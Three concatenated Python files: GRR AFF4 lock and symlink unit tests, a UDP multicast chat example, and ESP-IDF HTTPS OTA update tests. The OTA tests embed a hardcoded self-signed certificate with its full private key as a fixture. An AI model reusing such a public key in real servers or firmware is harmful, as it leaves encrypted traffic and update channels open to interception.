def testUpdateLeaseRaisesIfObjectIsNotLocked(self):
client = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, mode="w", token=self.token)
client.Set(client.Schema.HOSTNAME("client1"))
client.Close()
client = aff4.FACTORY.Open(self.client_id, token=self.token)
self.assertRaises(aff4.LockError, client.UpdateLease, 100)
def testUpdateLeaseRaisesIfLeaseHasExpired(self):
with test_lib.FakeTime(100):
client = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, mode="w", token=self.token)
client.Set(client.Schema.HOSTNAME("client1"))
client.Close()
try:
with aff4.FACTORY.OpenWithLock(
self.client_id, token=self.token, lease_time=100) as fd:
time.time = lambda: 250
self.assertRaises(aff4.LockError, fd.UpdateLease, 100)
except aff4.LockError:
# LockContextManager.__exit__ calls Close(), which calls Flush(),
# which calls CheckLease(), which raises LockError because the lease
# time has expired. Ignoring this exception.
pass
def testCheckLease(self):
with test_lib.FakeTime(100):
client = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, mode="w", token=self.token)
client.Set(client.Schema.HOSTNAME("client1"))
client.Close()
with self.assertRaises(aff4.LockError):
with aff4.FACTORY.OpenWithLock(
self.client_id, token=self.token, lease_time=300) as fd:
self.assertTrue(fd.CheckLease())
time.time = lambda: 500
self.assertEqual(fd.CheckLease(), 0)
def testUpdateLeaseWorksCorrectly(self):
with test_lib.FakeTime(100):
client = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, mode="w", token=self.token)
client.Set(client.Schema.HOSTNAME("client1"))
client.Close()
with aff4.FACTORY.OpenWithLock(
self.client_id, token=self.token, lease_time=100) as fd:
fd.UpdateLease(200)
time.time = lambda: 250
# If lease is updated correctly, object can't be OpenedWithLock again,
# because it's already locked and lease hasn't expired.
def TryOpen():
with aff4.FACTORY.OpenWithLock(
self.client_id, token=self.token, blocking=False):
pass
self.assertRaises(aff4.LockError, TryOpen)
def testLockProtectedAttributesWorkCorrectly(self):
obj = aff4.FACTORY.Create(
"aff4:/obj", ObjectWithLockProtectedAttribute, token=self.token)
obj.Close()
# Lock-protected attribute can't be set when plain Open() is used.
obj = aff4.FACTORY.Open("aff4:/obj", mode="rw", token=self.token)
obj.Set(obj.Schema.UNPROTECTED_ATTR("value"))
self.assertRaises(IOError, obj.Set, obj.Schema.LOCK_PROTECTED_ATTR("value"))
obj.Close()
# Lock-protected attribute is successfully set, because the object is
# locked with OpenWithLock().
with aff4.FACTORY.OpenWithLock("aff4:/obj", token=self.token) as obj:
obj.Set(obj.Schema.UNPROTECTED_ATTR("value"))
obj.Set(obj.Schema.LOCK_PROTECTED_ATTR("value"))
# We can't respect locks during blind-write operations.
obj = aff4.FACTORY.Create(
"aff4:/obj", ObjectWithLockProtectedAttribute, token=self.token)
obj.Set(obj.Schema.UNPROTECTED_ATTR("value"))
obj.Set(obj.Schema.LOCK_PROTECTED_ATTR("value"))
obj.Close()
def testAddLabelsCallAddsMultipleLabels(self):
"""Check we can set and remove labels."""
with aff4.FACTORY.Create(
"C.0000000000000001",
aff4_grr.VFSGRRClient,
mode="rw",
token=self.token) as client:
labels = ["label1", "label2", "label3"]
client.AddLabels(labels)
# Check that labels are correctly set in the current object.
self.assertListEqual(labels, client.GetLabelsNames())
# Check that labels are correctly set in the object that is fresh from the
# data store.
client = aff4.FACTORY.Open("C.0000000000000001", token=self.token)
self.assertListEqual(labels, client.GetLabelsNames())
def testRemoveLabelsCallRemovesMultipleLabels(self):
with aff4.FACTORY.Create(
"C.0000000000000001",
aff4_grr.VFSGRRClient,
mode="rw",
token=self.token) as client:
labels = ["label1", "label2", "label3"]
client.AddLabels(labels)
with aff4.FACTORY.Create(
"C.0000000000000001",
aff4_grr.VFSGRRClient,
mode="rw",
token=self.token) as client:
client.RemoveLabel("label1")
self.assertEqual(["label2", "label3"], list(client.GetLabelsNames()))
def testPathSpecInterpolation(self):
# Create a base directory containing a pathspec.
os_urn = rdfvalue.RDFURN("aff4:/C.0000000000000002/fs/os")
pathspec = rdf_paths.PathSpec(
path="/", pathtype=rdf_paths.PathSpec.PathType.OS)
additional_path = "/var/log"
fd = aff4.FACTORY.Create(
os_urn, aff4_standard.VFSDirectory, token=self.token)
fd.Set(fd.Schema.PATHSPEC(pathspec))
fd.Close()
# Now we open a path below this aff4 directory.
fd = aff4.FACTORY.Create(
os_urn.Add(additional_path),
aff4_standard.VFSDirectory,
mode="rw",
token=self.token)
flow_id = fd.Update(attribute="CONTAINS")
flow_obj = aff4.FACTORY.Open(flow_id, token=self.token)
self.assertEqual(flow_obj.args.pathspec.pathtype, pathspec.pathtype)
self.assertEqual(flow_obj.args.pathspec.CollapsePath(), additional_path)
def testExistsWithTypeReturnsFalseWhenNoObject(self):
self.assertFalse(
aff4.FACTORY.ExistsWithType(
"aff4:/foo/bar",
aff4_type=aff4_standard.VFSDirectory,
token=self.token))
def testExistsWithTypeReturnsFalseWhenObjectHasWrongType(self):
with aff4.FACTORY.Create(
"aff4:/foo/bar", aff4.AFF4MemoryStream, token=self.token):
pass
self.assertFalse(
aff4.FACTORY.ExistsWithType(
"aff4:/foo/bar",
aff4_type=aff4_standard.VFSDirectory,
token=self.token))
def testExistsWithTypeReturnsTrueWhenObjectHasCorrectType(self):
with aff4.FACTORY.Create(
"aff4:/foo/bar", aff4_standard.VFSDirectory, token=self.token):
pass
self.assertTrue(
aff4.FACTORY.ExistsWithType(
"aff4:/foo/bar",
aff4_type=aff4_standard.VFSDirectory,
token=self.token))
# TODO(amoser): re-work this test and re-enable.
def disabled_testAFF4Initialization(self):
blacklist = set([aff4.AFF4Stream, aff4_grr.VFSGRRClient])
factory = aff4.FACTORY
for cls in itervalues(aff4.AFF4Object.classes):
if cls not in blacklist:
with utils.Stubber(aff4, "FACTORY", None):
try:
factory.Create("aff4:/test_object", cls, token=self.token)
except AttributeError as e:
self.fail("Class %s used aff4.FACTORY during init: %s" % (cls, e))
class AFF4SymlinkTestSubject(aff4.AFF4Volume):
"""A test subject for AFF4SymlinkTest."""
class SchemaCls(aff4.AFF4Object.SchemaCls):
SOME_STRING = aff4.Attribute("metadata:some_string", rdfvalue.RDFString,
"SomeString")
def Initialize(self):
self.test_var = 42
def testMethod(self):
return str(self.Get(self.Schema.SOME_STRING)) + "-suffix"
class AFF4SymlinkTest(aff4_test_lib.AFF4ObjectTest):
"""Tests the AFF4Symlink."""
symlink_source_urn = rdfvalue.RDFURN("aff4:/symlink")
symlink_target_urn = rdfvalue.RDFURN("aff4:/C.0000000000000001")
def CreateAndOpenObjectAndSymlink(self):
with aff4.FACTORY.Create(
self.symlink_target_urn, AFF4SymlinkTestSubject,
token=self.token) as fd:
fd.Set(fd.Schema.SOME_STRING, rdfvalue.RDFString("the_string"))
with aff4.FACTORY.Create(
self.symlink_source_urn, aff4.AFF4Symlink, token=self.token) as symlink:
symlink.Set(symlink.Schema.SYMLINK_TARGET, self.symlink_target_urn)
fd = aff4.FACTORY.Open(self.symlink_target_urn, token=self.token)
symlink = aff4.FACTORY.Open(self.symlink_source_urn, token=self.token)
return (fd, symlink)
def testOpenedSymlinkUrnIsEqualToTargetUrn(self):
fd, symlink_obj = self.CreateAndOpenObjectAndSymlink()
self.assertEqual(symlink_obj.urn, fd.urn)
def testOpenedObjectHasSymlinkUrnAttributeSet(self):
_, symlink_obj = self.CreateAndOpenObjectAndSymlink()
self.assertIsNotNone(symlink_obj.symlink_urn)
self.assertEqual(symlink_obj.urn, self.symlink_target_urn)
self.assertEqual(symlink_obj.symlink_urn, self.symlink_source_urn)
def testMultiOpenMixedObjects(self):
"""Test symlinks are correct when using multiopen with other objects."""
fd, _ = self.CreateAndOpenObjectAndSymlink()
fd_urn1 = fd.urn
fd_urn2 = rdfvalue.RDFURN("aff4:/C.0000000000000002")
fd = aff4.FACTORY.Create(fd_urn2, aff4.AFF4Image, token=self.token)
fd.Close()
for fd in aff4.FACTORY.MultiOpen([self.symlink_source_urn, fd_urn2],
token=self.token):
if fd.urn == fd_urn2:
self.assertIsInstance(fd, aff4.AFF4Image)
elif fd.urn == fd_urn1:
self.assertIsInstance(fd, AFF4SymlinkTestSubject)
self.assertIsNotNone(fd.symlink_urn)
self.assertEqual(fd.urn, self.symlink_target_urn)
self.assertEqual(fd.symlink_urn, self.symlink_source_urn)
else:
raise ValueError("Unexpected URN: %s" % fd.urn)
def testMultiOpenMixedObjectWithCheckedAff4Type(self):
fd, _ = self.CreateAndOpenObjectAndSymlink()
fd_urn2 = rdfvalue.RDFURN("aff4:/C.0000000000000002")
fd = aff4.FACTORY.Create(fd_urn2, aff4.AFF4Image, token=self.token)
fd.Close()
# AFF4Image object should be ignored due to aff4_type check.
# At the same, type check shouldn't filter out the symlink,
# but should check the symlinked object.
fds = list(
aff4.FACTORY.MultiOpen([self.symlink_source_urn, fd_urn2],
aff4_type=AFF4SymlinkTestSubject,
token=self.token))
self.assertLen(fds, 1)
self.assertIsInstance(fds[0], AFF4SymlinkTestSubject)
# AFF4Image should be returned, but symlinked AFF4SymlinkTestSubject should
# get filtered out due to aff4_type restriction.
fds = list(
aff4.FACTORY.MultiOpen([self.symlink_source_urn, fd_urn2],
aff4_type=aff4.AFF4Image,
token=self.token))
self.assertLen(fds, 1)
self.assertIsInstance(fds[0], aff4.AFF4Image)
def testOpenedSymlinkAFF4AttributesAreEqualToTarget(self):
fd, symlink_obj = self.CreateAndOpenObjectAndSymlink()
for attr in fd.Schema.ListAttributes():
self.assertEqual(symlink_obj.Get(attr), fd.Get(attr))
def main(argv):
# Run the full test suite
test_lib.main(argv)
if __name__ == "__main__":
app.run(main)
|
multicast_test.py
|
# coding: utf-8
#########################################################################
# Website: <a href="http://www.crazyit.org">Crazy Java League</a>            #
# author yeeku.H.lee kongyeeku@163.com #
# #
# version 1.0 #
# #
# Copyright (C), 2001-2018, yeeku.H.Lee #
# #
# This program is protected by copyright laws. #
# #
# Program Name: #
# #
# <br>Date: #
#########################################################################
import time, socket, threading, os
# Local machine IP address
SENDERIP = '192.168.1.88'
# Local port
SENDERPORT = 30000
# Multicast group IP address used by this program
MYGROUP = '230.0.0.1'
# Create a UDP-based socket by specifying the type argument
s = socket.socket(type=socket.SOCK_DGRAM)
# Bind the socket to the wildcard address 0.0.0.0
s.bind(('0.0.0.0', SENDERPORT)) # ①
# Set the TTL (Time-To-Live) for multicast messages
s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 64)
# Allow multiple sockets to reuse the same port for multicast
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Join the socket to the multicast group
status = s.setsockopt(socket.IPPROTO_IP,
socket.IP_ADD_MEMBERSHIP,
socket.inet_aton(MYGROUP) + socket.inet_aton(SENDERIP))
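# The membership request above is the raw byte layout of a struct ip_mreq:
# 4 bytes of multicast group address followed by 4 bytes of local interface
# address. A sketch of the same request built more explicitly (assuming the
# standard IPv4 ip_mreq layout):
#   import struct
#   mreq = struct.pack("4s4s", socket.inet_aton(MYGROUP), socket.inet_aton(SENDERIP))
#   s.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)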
# Function that reads data from the socket
def read_socket(sock):
while True:
data = sock.recv(2048)
        print("Message: ", data.decode('utf-8'))
# Start a thread with read_socket as the target
threading.Thread(target=read_socket, args=(s, )).start()
# Keep reading keyboard input in a loop and send it to the socket
while True:
line = input('')
if line is None or line == 'exit':
break
os._exit(0)
# Send line to the socket
s.sendto(line.encode('utf-8'), (MYGROUP, SENDERPORT))
|
example_test.py
|
import re
import os
import socket
import BaseHTTPServer
import SimpleHTTPServer
from threading import Thread
import ssl
from tiny_test_fw import DUT
import ttfw_idf
import random
import subprocess
server_cert = "-----BEGIN CERTIFICATE-----\n" \
"MIIDXTCCAkWgAwIBAgIJAP4LF7E72HakMA0GCSqGSIb3DQEBCwUAMEUxCzAJBgNV\n"\
"BAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5ldCBX\n"\
"aWRnaXRzIFB0eSBMdGQwHhcNMTkwNjA3MDk1OTE2WhcNMjAwNjA2MDk1OTE2WjBF\n"\
"MQswCQYDVQQGEwJBVTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50\n"\
"ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB\n"\
"CgKCAQEAlzfCyv3mIv7TlLkObxunKfCdrJ/zgdANrsx0RBtpEPhV560hWJ0fEin0\n"\
"nIOMpJSiF9E6QsPdr6Q+eogH4XnOMU9JE+iG743N1dPfGEzJvRlyct/Ck8SswKPC\n"\
"9+VXsnOdZmUw9y/xtANbURA/TspvPzz3Avv382ffffrJGh7ooOmaZSCZFlSYHLZA\n"\
"w/XlRr0sSRbLpFGY0gXjaAV8iHHiPDYLy4kZOepjV9U51xi+IGsL4w75zuMgsHyF\n"\
"3nJeGYHgtGVBrkL0ZKG5udY0wcBjysjubDJC4iSlNiq2HD3fhs7j6CZddV2v845M\n"\
"lVKNxP0kO4Uj4D8r+5USWC8JKfAwxQIDAQABo1AwTjAdBgNVHQ4EFgQU6OE7ssfY\n"\
"IIPTDThiUoofUpsD5NwwHwYDVR0jBBgwFoAU6OE7ssfYIIPTDThiUoofUpsD5Nww\n"\
"DAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAXIlHS/FJWfmcinUAxyBd\n"\
"/xd5Lu8ykeru6oaUCci+Vk9lyoMMES7lQ+b/00d5x7AcTawkTil9EWpBTPTOTraA\n"\
"lzJMQhNKmSLk0iIoTtAJtSZgUSpIIozqK6lenxQQDsHbXKU6h+u9H6KZE8YcjsFl\n"\
"6vL7sw9BVotw/VxfgjQ5OSGLgoLrdVT0z5C2qOuwOgz1c7jNiJhtMdwN+cOtnJp2\n"\
"fuBgEYyE3eeuWogvkWoDcIA8r17Ixzkpq2oJsdvZcHZPIZShPKW2SHUsl98KDemu\n"\
"y0pQyExmQUbwKE4vbFb9XuWCcL9XaOHQytyszt2DeD67AipvoBwVU7/LBOvqnsmy\n"\
"hA==\n"\
"-----END CERTIFICATE-----\n"
server_key = "-----BEGIN PRIVATE KEY-----\n"\
"MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCXN8LK/eYi/tOU\n"\
"uQ5vG6cp8J2sn/OB0A2uzHREG2kQ+FXnrSFYnR8SKfScg4yklKIX0TpCw92vpD56\n"\
"iAfhec4xT0kT6Ibvjc3V098YTMm9GXJy38KTxKzAo8L35Veyc51mZTD3L/G0A1tR\n"\
"ED9Oym8/PPcC+/fzZ999+skaHuig6ZplIJkWVJgctkDD9eVGvSxJFsukUZjSBeNo\n"\
"BXyIceI8NgvLiRk56mNX1TnXGL4gawvjDvnO4yCwfIXecl4ZgeC0ZUGuQvRkobm5\n"\
"1jTBwGPKyO5sMkLiJKU2KrYcPd+GzuPoJl11Xa/zjkyVUo3E/SQ7hSPgPyv7lRJY\n"\
"Lwkp8DDFAgMBAAECggEAfBhAfQE7mUByNbxgAgI5fot9eaqR1Nf+QpJ6X2H3KPwC\n"\
"02sa0HOwieFwYfj6tB1doBoNq7i89mTc+QUlIn4pHgIowHO0OGawomeKz5BEhjCZ\n"\
"4XeLYGSoODary2+kNkf2xY8JTfFEcyvGBpJEwc4S2VyYgRRx+IgnumTSH+N5mIKZ\n"\
"SXWNdZIuHEmkwod+rPRXs6/r+PH0eVW6WfpINEbr4zVAGXJx2zXQwd2cuV1GTJWh\n"\
"cPVOXLu+XJ9im9B370cYN6GqUnR3fui13urYbnWnEf3syvoH/zuZkyrVChauoFf8\n"\
"8EGb74/HhXK7Q2s8NRakx2c7OxQifCbcy03liUMmyQKBgQDFAob5B/66N4Q2cq/N\n"\
"MWPf98kYBYoLaeEOhEJhLQlKk0pIFCTmtpmUbpoEes2kCUbH7RwczpYko8tlKyoB\n"\
"6Fn6RY4zQQ64KZJI6kQVsjkYpcP/ihnOY6rbds+3yyv+4uPX7Eh9sYZwZMggE19M\n"\
"CkFHkwAjiwqhiiSlUxe20sWmowKBgQDEfx4lxuFzA1PBPeZKGVBTxYPQf+DSLCre\n"\
"ZFg3ZmrxbCjRq1O7Lra4FXWD3dmRq7NDk79JofoW50yD8wD7I0B7opdDfXD2idO8\n"\
"0dBnWUKDr2CAXyoLEINce9kJPbx4kFBQRN9PiGF7VkDQxeQ3kfS8CvcErpTKCOdy\n"\
"5wOwBTwJdwKBgDiTFTeGeDv5nVoVbS67tDao7XKchJvqd9q3WGiXikeELJyuTDqE\n"\
"zW22pTwMF+m3UEAxcxVCrhMvhkUzNAkANHaOatuFHzj7lyqhO5QPbh4J3FMR0X9X\n"\
"V8VWRSg+jA/SECP9koOl6zlzd5Tee0tW1pA7QpryXscs6IEhb3ns5R2JAoGAIkzO\n"\
"RmnhEOKTzDex611f2D+yMsMfy5BKK2f4vjLymBH5TiBKDXKqEpgsW0huoi8Gq9Uu\n"\
"nvvXXAgkIyRYF36f0vUe0nkjLuYAQAWgC2pZYgNLJR13iVbol0xHJoXQUHtgiaJ8\n"\
"GLYFzjHQPqFMpSalQe3oELko39uOC1CoJCHFySECgYBeycUnRBikCO2n8DNhY4Eg\n"\
"9Y3oxcssRt6ea5BZwgW2eAYi7/XqKkmxoSoOykUt3MJx9+EkkrL17bxFSpkj1tvL\n"\
"qvxn7egtsKjjgGNAxwXC4MwCvhveyUQQxtQb8AqGrGqo4jEEN0L15cnP38i2x1Uo\n"\
"muhfskWf4MABV0yTUaKcGg==\n"\
"-----END PRIVATE KEY-----\n"
def get_my_ip():
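    # connect() on a UDP socket sends no packets; it only makes the OS choose the
    # outbound interface for the given destination, so getsockname() afterwards
    # reports the local address that would be used to reach 8.8.8.8.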
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.connect(("8.8.8.8", 80))
my_ip = s1.getsockname()[0]
s1.close()
return my_ip
def get_server_status(host_ip, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_status = sock.connect_ex((host_ip, port))
sock.close()
if server_status == 0:
return True
return False
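# Usage sketch: get_server_status(host_ip, 8001) returns True when something is
# already listening on that port (connect_ex() == 0), so the tests below only
# spawn a new HTTPS server thread when the port is still free.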
def create_file(server_file, file_data):
with open(server_file, "w+") as file:
file.write(file_data)
def get_ca_cert(ota_image_dir):
os.chdir(ota_image_dir)
server_file = os.path.join(ota_image_dir, "server_cert.pem")
create_file(server_file, server_cert)
key_file = os.path.join(ota_image_dir, "server_key.pem")
create_file(key_file, server_key)
return server_file, key_file
def start_https_server(ota_image_dir, server_ip, server_port):
server_file, key_file = get_ca_cert(ota_image_dir)
httpd = BaseHTTPServer.HTTPServer((server_ip, server_port),
SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
def start_chunked_server(ota_image_dir, server_port):
server_file, key_file = get_ca_cert(ota_image_dir)
chunked_server = subprocess.Popen(["openssl", "s_server", "-WWW", "-key", key_file, "-cert", server_file, "-port", str(server_port)])
return chunked_server
def redirect_handler_factory(url):
"""
Returns a request handler class that redirects to supplied `url`
"""
class RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
print("Sending resp, URL: " + url)
self.send_response(301)
self.send_header('Location', url)
self.end_headers()
return RedirectHandler
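# Hypothetical usage of the factory above (the URL and port are illustrative only;
# the real test additionally wraps the server socket with ssl):
#   handler_cls = redirect_handler_factory("https://192.168.1.10:8001/advanced_https_ota.bin")
#   BaseHTTPServer.HTTPServer(("0.0.0.0", 8081), handler_cls).serve_forever()
# Every GET is then answered with a 301 whose Location header points at the real server.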
def start_redirect_server(ota_image_dir, server_ip, server_port, redirection_port):
os.chdir(ota_image_dir)
server_file, key_file = get_ca_cert(ota_image_dir)
redirectHandler = redirect_handler_factory("https://" + server_ip + ":" + str(redirection_port) + "/advanced_https_ota.bin")
httpd = BaseHTTPServer.HTTPServer((server_ip, server_port),
redirectHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_advanced_https_ota_example(env, extra_data):
"""
    This is a positive test case, which downloads the complete binary file multiple times.
Number of iterations can be specified in variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut("advanced_https_ota_example", "examples/system/ota/advanced_https_ota", dut_class=ttfw_idf.ESP32DUT)
# Number of iterations to validate OTA
iterations = 3
server_port = 8001
# File to be downloaded. This file is generated after compilation
bin_name = "advanced_https_ota.bin"
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("advanced_https_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("advanced_https_ota_bin_size", bin_size // 1024)
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
for i in range(iterations):
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.close()
dut1.expect("Starting Advanced OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":" + str(server_port) + "/" + bin_name))
dut1.write("https://" + host_ip + ":" + str(server_port) + "/" + bin_name)
dut1.expect("Loaded app from partition at offset", timeout=60)
dut1.expect("Starting Advanced OTA example", timeout=30)
dut1.reset()
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_advanced_https_ota_example_truncated_bin(env, extra_data):
"""
    This test case validates OTA behavior when the binary file is truncated.
    The application should return an error message in this case.
steps: |
1. join AP
2. Generate truncated binary file
3. Fetch OTA image over HTTPS
4. Check working of code if bin is truncated
"""
dut1 = env.get_dut("advanced_https_ota_example", "examples/system/ota/advanced_https_ota", dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Original binary file generated after compilation
bin_name = "advanced_https_ota.bin"
# Truncated binary file to be generated from original binary file
truncated_bin_name = "truncated.bin"
    # Size of the truncated file to be generated. This value can range from 288 bytes (the image header size) to the size of the original binary file.
    # truncated_bin_size is set to 64000 to reduce the time consumed by the test case.
truncated_bin_size = 64000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, "r+")
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), "w+")
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("advanced_https_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("advanced_https_ota_bin_size", bin_size // 1024)
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect("Starting Advanced OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":" + str(server_port) + "/" + truncated_bin_name))
dut1.write("https://" + host_ip + ":" + str(server_port) + "/" + truncated_bin_name)
dut1.expect("Image validation failed, image is corrupted", timeout=30)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_advanced_https_ota_example_truncated_header(env, extra_data):
"""
    This test case validates OTA behavior when the headers of the binary file are truncated.
    The application should return an error message in this case.
steps: |
1. join AP
2. Generate binary file with truncated headers
3. Fetch OTA image over HTTPS
4. Check working of code if headers are not sent completely
"""
dut1 = env.get_dut("advanced_https_ota_example", "examples/system/ota/advanced_https_ota", dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Original binary file generated after compilation
bin_name = "advanced_https_ota.bin"
# Truncated binary file to be generated from original binary file
truncated_bin_name = "truncated_header.bin"
    # Size of the truncated file to be generated. This value should be less than 288 bytes (the image header size).
truncated_bin_size = 180
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, "r+")
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), "w+")
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("advanced_https_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("advanced_https_ota_bin_size", bin_size // 1024)
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect("Starting Advanced OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":" + str(server_port) + "/" + truncated_bin_name))
dut1.write("https://" + host_ip + ":" + str(server_port) + "/" + truncated_bin_name)
dut1.expect("advanced_https_ota_example: esp_https_ota_read_img_desc failed", timeout=30)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_advanced_https_ota_example_random(env, extra_data):
"""
    This test case validates OTA behavior when the binary file contains random data.
    Magic byte verification should fail in this case.
steps: |
1. join AP
2. Generate random binary image
3. Fetch OTA image over HTTPS
4. Check working of code for random binary file
"""
dut1 = env.get_dut("advanced_https_ota_example", "examples/system/ota/advanced_https_ota", dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Random binary file to be generated
random_bin_name = "random.bin"
    # Size of the random binary file. 32000 is chosen to reduce the time required to run the test case.
random_bin_size = 32000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, random_bin_name)
fo = open(binary_file, "w+")
    # The first byte of the binary file is always set to zero. If the first byte were generated randomly,
    # it could turn out to be 0xE9, which would make the test case fail.
fo.write(str(0))
for i in range(random_bin_size - 1):
fo.write(str(random.randrange(0,255,1)))
fo.close()
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("advanced_https_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("advanced_https_ota_bin_size", bin_size // 1024)
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect("Starting Advanced OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":" + str(server_port) + "/" + random_bin_name))
dut1.write("https://" + host_ip + ":" + str(server_port) + "/" + random_bin_name)
dut1.expect("esp_ota_ops: OTA image has invalid magic byte", timeout=10)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_advanced_https_ota_example_chunked(env, extra_data):
"""
    This is a positive test case, which downloads the complete binary file multiple times.
Number of iterations can be specified in variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut("advanced_https_ota_example", "examples/system/ota/advanced_https_ota", dut_class=ttfw_idf.ESP32DUT)
# File to be downloaded. This file is generated after compilation
bin_name = "advanced_https_ota.bin"
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("advanced_https_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("advanced_https_ota_bin_size", bin_size // 1024)
# start test
host_ip = get_my_ip()
chunked_server = start_chunked_server(dut1.app.binary_path, 8070)
dut1.start_app()
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect("Starting Advanced OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":8070/" + bin_name))
dut1.write("https://" + host_ip + ":8070/" + bin_name)
dut1.expect("Loaded app from partition at offset", timeout=60)
dut1.expect("Starting Advanced OTA example", timeout=30)
chunked_server.kill()
os.remove(os.path.join(dut1.app.binary_path, "server_cert.pem"))
os.remove(os.path.join(dut1.app.binary_path, "server_key.pem"))
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_advanced_https_ota_example_redirect_url(env, extra_data):
"""
This is a positive test case, which starts a server and a redirection server.
    The redirection server redirects the HTTP request to a different port.
Number of iterations can be specified in variable iterations.
